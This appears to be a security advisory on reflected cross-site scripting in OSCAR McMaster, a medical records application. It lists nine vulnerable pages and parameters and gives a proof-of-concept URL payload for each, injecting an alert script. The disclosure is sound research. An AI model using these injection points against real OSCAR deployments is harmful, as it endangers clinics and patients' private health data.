A reflected Cross Site Scripting vulnerability exists in multiple pages in version 19.40~1235 of the OSCAR McMaster application that allows for arbitrary execution of JavaScript commands.
[Placeholder for CVE mitre]
Vulnerable JSP Pages:
documentReport.jsp - functionid, function, curUser parameters
addappointment.jsp - duration, end_time, start_time, day, month, year, provider_no parameters
unLock.jsp - userName parameter
semographiccontrol.jsp - keyword parameter
providercontrol.jsp - provider_no, viewall, view, month, year, day, every_min parameters
CalendarPopup.jsp - month, year, param, urlfrom parameters
logReport.jsp - endDate, startDate parameters
SendDemoMessage.do - demographic_no parameter
ViewConsultation.do - demographic_no parameter
Example Vulnerable Payloads:
documentReport.jsp - /oscar/dms/documentReport.jsp?function=provider&functionid=999998&curUser=999998daka4%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Eowtpz
addappointment.jsp - /oscar/appointment/addappointment.jsp?provider_no=999998&bFirstDisp=true&year=2021&month=08&day=27&start_time=08:00&end_time=08%3a14pyqzl'><script>alert(document.domain)<%2fscript>mam5x&duration=null
unLock.jsp - /oscar/admin/unLock.jsp?userName=192.168.105.149w5q31%3Cscript%3Ealert(document.domain)%3C%2fscript%3Efe9hjvibv0e&submit=Unlock
semographiccontrol.jsp - /oscar/demographic/demographiccontrol.jsp?search_mode=search_name&keyword=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&orderby=last_name%2C+first_name&dboperation=search_titlename&limit1=0&limit2=10&displaymode=Search&ptstatus=active&fromMessenger=false&outofdomain=
providercontrol.jsp - /oscar/provider/providercontrol.jsp?year=%3Cscript%3Ealert(document.domain)%3C/script%3E;&month=8&day=18&view=0&curProvider=null&curProviderName=null&displaymode=day&dboperation=searchappointmentday
CalendarPopup.jsp - /oscar/share/CalendarPopup.jsp?urlfrom=xm4vs"><script>alert(document.domain)<%2fscript>mrrlq&year=2021&month=08¶m=%26view%3D0%26displaymode%3Dday%26dboperation%3Dsearchappointmentday%26viewall%3D1
logReport.jsp - /oscar/admin/logReport.jsp?providerNo=*&content=admin&startDate=2021-08-29b2266"><script>alert(document.domain)<%2fscript>xdzr6digegi&endDate=2021-08-30&submit=Run+Report
SendDemoMessage.do - /oscar/oscarMessenger/SendDemoMessage.do?demographic_no=dllj2%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ej7t05
ViewConsultation.do - /oscar/oscarEncounter/ViewConsultation.do?sendTo=i15ji%3cscript%3ealert(document.domain)%3c%2fscript%3eu5x29&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2%27%20ASC&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=
Discovered by Jack McBride, August 2021